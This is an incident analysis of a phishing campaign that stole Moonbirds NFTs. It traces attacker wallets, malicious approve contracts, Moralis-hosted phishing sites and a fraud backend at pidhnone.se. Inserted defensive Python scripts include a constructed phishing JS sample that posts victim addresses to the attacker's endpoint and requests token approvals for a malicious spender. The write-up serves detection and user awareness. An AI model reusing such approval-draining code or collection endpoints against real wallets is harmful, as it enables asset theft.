Slow Mist: Analysis of the source of 29 Moonbirds NFT theft incidents

2022-05-28 12:41
Original Source: SlowMist Technology
Original Author: Brother Shan & Yao, SlowMist Security Team


Event Background   


On May 25th, Twitter user @0xLosingMoney reported that 29 Moonbirds NFTs worth more than $700,000 had been stolen through the phishing website p2peers.io, in connection with the Twitter account @Dvincent_; the phishing website is currently inaccessible. The user added that the domains sarek.fi and p2peers.io had both been used in past hacks.


Twitter original


Collect relevant information  


SlowMist security team received relevant intelligence and conducted a source analysis of the theft.


We started by collecting and analyzing information about this phishing incident on Twitter. It was found that @Dvincent_ was the hacker's Twitter account, and the account has since been deleted. According to records from May 10th, Twitter user @just1n_eth (the holder of a BAYC series NFT) said that @Dvincent_ had contacted him to trade BAYC NFTs, but because the other party insisted on using p2peers.io, the deal fell through.


Original tweet


In the comments on this tweet, user @jbe61 stated that he had encountered the same person and posted a screenshot of the conversation:



On the evening of May 25th, @0xLosingMoney continued to publish information about the hacker's wallet on Twitter.


Twitter original


The following are the hacker addresses given by @0xLosingMoney:


· 0xe8250Bb4eFa6D9d032f7d46393CEaE18168A6B0D

· 0x8e73fe4d5839c60847066b67ea657a67f42a0adf

· 0x6035B92fd5102b6113fE90247763e0ac22bfEF63

· 0xBf41EFdD1b815556c2416DcF427f2e896142aa53

· 0x29C80c2690F91A47803445c5922e76597D1DD2B6


Related address analysis


Since the phishing website "p2peers.io" is at the center of the whole theft, we started there. The p2peers site, registered through a Finnish domain registrar, has been suspended, but we found the contents of its homepage in the Google web cache.




From the cached copy of the page we could recover the front-end code of https://p2peers.io/; the main JS bundle is "js/app.eb17746b.js".


Because the JS can no longer be fetched directly, we used the snapshot history on the Cachedview website to retrieve the main JS source as of April 30, 2022.




By going through the JS, we found the phishing site's infrastructure information and the transaction addresses embedded in the code.


The approve (spender) address is found at line 912:

0x7F748D5fb52b9717f83Ed69f49fc4c2f15d83b6A



At line 3407 of the code, we also found another address used in approve-related operations:


0xc9E39Ad832cea1677426e5fA8966416337F88749



We started to analyze the transaction records of these two addresses:


0x7F748D5fb52b9717f83Ed69f49fc4c2f15d83b6A

0xc9E39Ad832cea1677426e5fA8966416337F88749


Querying Etherscan first showed that 0x7F7...b6A is a malicious contract address:



The creator (attacker) of this malicious contract is the address 0xd975f8c82932f55c7cef51eb4247f2bea9604aa3, which has multiple NFT transaction records:



We checked further on the NFTGO website. According to the current NFT holdings of this address, the stolen NFTs are still sitting at this address and have not been sold, with a total value of about 225,475 US dollars.



Using NFTSCAN, we found a total of 21 NFTs, worth 96.5 ETH.



We then used MistTrack to analyze the attacker address's transaction history:


This address has only 12 ETH transactions in total, and its balance is only 0.0615 ETH.



0xc9E39Ad832cea1677426e5fA8966416337F88749 is also a contract address; its creator is 0x6035B92fd5102b6113fE90247763e0ac22bfEF63, which also appears in the list of hacker addresses published by @0xLosingMoney.



MistTrack shows that this address does not hold much either: it has 21 deposits and 97 withdrawals, with a total of 106.2 ETH transferred out.



Looking at the inbound and outbound transfers, there are multiple transfers to Tornado.Cash, showing that the hackers have been moving the stolen funds out through several channels.
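The flow analysis described above (counting deposits and withdrawals, totalling the ETH moved out, and spotting transfers to a known mixer) can be reproduced over a plain transaction export. The following is an added example, not SlowMist's or MistTrack's code: the subject address is the one from the write-up, but the counterparties, transaction hashes, amounts and the "mixer"/"exchange" labels are constructed placeholders, and the tracing heuristic (share of outflow going to labelled mixers) is the author's own.

```python
from collections import defaultdict

# Subject address from the write-up; everything below it is constructed demo data.
SUBJECT = "0x6035B92fd5102b6113fE90247763e0ac22bfEF63"

# An analyst's address book: counterparty -> label. Placeholder addresses, not real ones.
LABELS = {
    "0x" + "11" * 20: "mixer (placeholder)",
    "0x" + "22" * 20: "exchange deposit (placeholder)",
}

# Constructed transaction export in the shape a block explorer CSV/JSON would give.
SAMPLE_TXS = [
    {"hash": "0xa1", "from": "0x" + "aa" * 20, "to": SUBJECT, "value_eth": 10.0},
    {"hash": "0xa2", "from": "0x" + "bb" * 20, "to": SUBJECT.lower(), "value_eth": 20.0},
    {"hash": "0xa3", "from": "0x" + "cc" * 20, "to": SUBJECT, "value_eth": 5.0},
    {"hash": "0xb1", "from": SUBJECT, "to": "0x" + "11" * 20, "value_eth": 10.0},
    {"hash": "0xb2", "from": SUBJECT.lower(), "to": "0x" + "11" * 20, "value_eth": 10.0},
    {"hash": "0xb3", "from": SUBJECT, "to": "0x" + "22" * 20, "value_eth": 5.0},
    {"hash": "0xb4", "from": SUBJECT, "to": "0x" + "dd" * 20, "value_eth": 9.9},
]


def summarize_flows(txs, subject, labels):
    """Count inbound/outbound transfers for `subject` and bucket outflows by label.

    Addresses are compared case-insensitively because explorers and wallets mix
    checksummed and lowercase forms of the same address."""
    subject = subject.lower()
    labels = {addr.lower(): label for addr, label in labels.items()}
    labelled_out = defaultdict(float)
    in_count = out_count = 0
    in_eth = out_eth = unlabelled_out = 0.0
    for tx in txs:
        src, dst, value = tx["from"].lower(), tx["to"].lower(), float(tx["value_eth"])
        if dst == subject:
            in_count += 1
            in_eth += value
        elif src == subject:
            out_count += 1
            out_eth += value
            if dst in labels:
                labelled_out[labels[dst]] += value
            else:
                unlabelled_out += value
    return {
        "in_count": in_count,
        "out_count": out_count,
        "in_eth": round(in_eth, 9),
        "out_eth": round(out_eth, 9),
        "net_eth": round(in_eth - out_eth, 9),       # what is left on the address
        "labelled_outflows": dict(labelled_out),
        "unlabelled_out_eth": round(unlabelled_out, 9),
    }


def mixer_share(summary):
    """Fraction of total outflow that went to counterparties labelled as mixers."""
    if summary["out_eth"] == 0:
        return 0.0
    to_mixers = sum(v for label, v in summary["labelled_outflows"].items() if "mixer" in label)
    return round(to_mixers / summary["out_eth"], 6)


if __name__ == "__main__":
    s = summarize_flows(SAMPLE_TXS, SUBJECT, LABELS)
    print(s)
    print("share of outflow to mixers:", mixer_share(s))
```

In practice the address book is the part that takes work: the counts and totals are mechanical, and the finding in the write-up (funds going to Tornado.Cash) only emerges once the mixer's deposit contracts are labelled.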


Hackers abuse Moralis services


We found that line 409 of the JS code calls a service endpoint under the domain usemoralis.com:


Port 2053 is the API endpoint, and port 2083 is the management backend login.



Further querying showed a large number of NFT-related websites under the domain usemoralis.com, many of them phishing sites. A Google search turned up quite a few NFT sites and multiple subdomains.



So we enumerated the subdomains of usemoralis.com and found more than 3,000 related subdomain sites deployed behind Cloudflare.




Looking further, we found that these sites are all services provided by Moralis:




Moralis is a service for developing and building Web3 DApps.



After registering, one gets an API endpoint and a management backend right away, which makes the cost of standing up a phishing website very low.



The fraud control backend and related phishing incidents


Continuing through the JS code, we found that line 368 submits the victim's address to an API under the domain pidhnone.se.



The endpoints under the domain pidhnone.se are:

· https://pidhnone.se/api/store/log

· https://pidhnone.se/api/self-spoof/

· https://pidhnone.se/api/address/

· https://pidhnone.se/api/crypto/
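Everything this write-up pulled out of the recovered bundle (the approve spender addresses, the usemoralis.com API and backend ports, and the pidhnone.se collection endpoints) can be extracted from a phishing site's JS with a small triage script. The following is an added example, not SlowMist's tooling: the sample bundle is constructed for the demo and only reuses the addresses and hostnames named on this page, the watchlist is built from the domains named here, and the approval-spender resolution (following an identifier back to the string literal it is assigned) is the author's own approach.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed stand-in for a minified phishing bundle. The addresses and hostnames are
# the indicators named in the write-up; the surrounding JavaScript is made up for the demo.
SAMPLE_JS = r'''
var e={apiUrl:"https://abc123.usemoralis.com:2053/server",admin:"https://abc123.usemoralis.com:2083/"};
function g(t){return fetch("https://pidhnone.se/api/store/log",{method:"POST",body:JSON.stringify({victim:t})})}
const spender="0x7F748D5fb52b9717f83Ed69f49fc4c2f15d83b6A";
function h(n){return n.setApprovalForAll(spender,!0)}
function k(c,m){return c.approve("0xc9E39Ad832cea1677426e5fA8966416337F88749",m)}
fetch("https://pidhnone.se/api/self-spoof/");
'''

# Domains named in the write-up, used as a hunting watchlist (subdomains match too).
WATCHLIST_DOMAINS = {"p2peers.io", "usemoralis.com", "pidhnone.se", "nftshifter.io", "sarek.fi"}

ADDR_RE = re.compile(r"\b0x[0-9a-fA-F]{40}\b")
URL_RE = re.compile(r"https?://[^\s'\"`)]+")
# First argument of an approve()/setApprovalForAll() call: a quoted literal or an identifier.
APPROVAL_CALL_RE = re.compile(r'\b(?:setApprovalForAll|approve)\(\s*("?0x[0-9a-fA-F]{40}"?|[A-Za-z_$][\w$]*)')


def extract_indicators(js: str) -> dict:
    """Pull EVM addresses and network endpoints (host, port) out of a JS bundle."""
    addresses = sorted({m.lower() for m in ADDR_RE.findall(js)})
    endpoints = sorted(set(URL_RE.findall(js)))
    hosts = Counter()
    for url in endpoints:
        parts = urlsplit(url)
        port = parts.port or (443 if parts.scheme == "https" else 80)
        hosts[(parts.hostname, port)] += 1
    return {"addresses": addresses, "endpoints": endpoints, "hosts": hosts}


def approval_spenders(js: str) -> list:
    """Resolve which addresses the bundle hands to approve()/setApprovalForAll().

    A literal argument is taken as-is; an identifier is resolved to the address
    string it is assigned somewhere in the same bundle."""
    spenders = set()
    for arg in APPROVAL_CALL_RE.findall(js):
        if arg.startswith('"'):
            spenders.add(arg.strip('"').lower())
            continue
        assign = re.search(rf'\b{re.escape(arg)}\s*=\s*"(0x[0-9a-fA-F]{{40}})"', js)
        if assign:
            spenders.add(assign.group(1).lower())
    return sorted(spenders)


def match_watchlist(indicators: dict, domains=WATCHLIST_DOMAINS) -> dict:
    """Report which extracted hosts fall under a watchlisted domain, including subdomains."""
    hits = {}
    for (host, port), _count in indicators["hosts"].items():
        for dom in domains:
            if host == dom or host.endswith("." + dom):
                hits.setdefault(dom, []).append((host, port))
    return {dom: sorted(v) for dom, v in hits.items()}


if __name__ == "__main__":
    ind = extract_indicators(SAMPLE_JS)
    print("addresses:", ind["addresses"])
    print("endpoints:", ind["endpoints"])
    print("approval spenders:", approval_spenders(SAMPLE_JS))
    print("watchlist hits:", match_watchlist(ind))
```

The spender resolution is what separates an address that merely appears in a bundle from one the page will ask a wallet to approve; the former is noise in most Web3 front-ends, the latter is the indicator worth blocking and reporting. Hosts are keyed by (hostname, port) because, as the write-up notes for Moralis, the API and the operator backend sit on the same domain and differ only by port.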


Further analysis found that https://pidhnone.se/login is a fraud control backend operated by the hackers to manage stolen assets and related information.



Assembling the request paths from the backend's API, one can see both the attacker addresses and the victim addresses.

The backend also contains images and descriptive text for the API operations, which read as an unmistakable operating manual for a fraud site.



We analyzed the material hosted in the backend, such as the images:


https://pidhnone.se/images/recent.png?F5395958E0DB1E6E1E3BC66798BF4F8

https://pidhnone.se/images/2.gif?427f1b04b02f4e7869b1f402fcee11f6

https://pidhnone.se/images/gif.gif?24229b243c99d37cf83c2b4cdb4f6042

https://pidhnone.se/images/landing.png?0732db576131facc35ac81fa15db7a30

https://pidhnone.se/images/SSS-Create.png?14414444444586C2C2C3BB7D233FBE7FC81D7D

https://pidhnone.se/images/self-spoof.png?25e4255ee21ea903c40d1159ba519234


This backend references phishing websites the hackers have used in the past, such as nftshifter.io:


Taking nftshifter.io as an example:



Twitter records show that on March 25, 2022, a victim visited this phishing website and posted about it.



We analyzed nftshifter.io in the same way, obtaining its JS source and going through it:




It turns out that this site also uses the Moralis service and the same fraud backend at https://pidhnone.se/ for control.

The relevant malicious addresses:

Phishing contract:

0x8beebade5b1131cf6957f2e8f8294016c276a90f

Contract creator:

0x9d194CBca8d957c3FA4C7bb2B12Ff83Fca6398ee

Contract creation time:

Mar-24-2022 09:05:33 PM +UTC



We also found that there are 9 malicious contracts with the same code belonging to the same attacker:


Picking one malicious contract at random, 0xc9E...749, its creator address is 0x6035B92fd5102b6113fE90247763e0ac22bfEF63:

The proceeds were laundered in the same way. Each malicious contract already has victims on record, so we will not go through them one by one here.


Let's look at the timing of the victim's transaction:



Shortly after the attackers created the malicious phishing contract, a user fell for it.

The attacker has already sold the NFTs for ETH. We used MistTrack to analyze the attacker address 0x9d194cbca8d957c3fa4c7bb2b12ff83fca6398ee:


It shows that 51 ETH was transferred to Tornado.Cash for laundering. Meanwhile, the attacker's Twitter account @nftshifter_io has been suspended and can no longer be viewed.


Summary


It is clear that these attacks have been going on continuously and that a mature criminal supply chain exists. As of publication, new NFTs and transactions are still arriving at the hacker addresses. The hackers' phishing is run at scale: with one phishing template, a large number of phishing websites for different NFT projects can be cloned in batches. When the cost of attacking becomes this low, ordinary users need to be all the more vigilant, strengthen their security awareness, stay suspicious at all times, and avoid becoming the next victim.

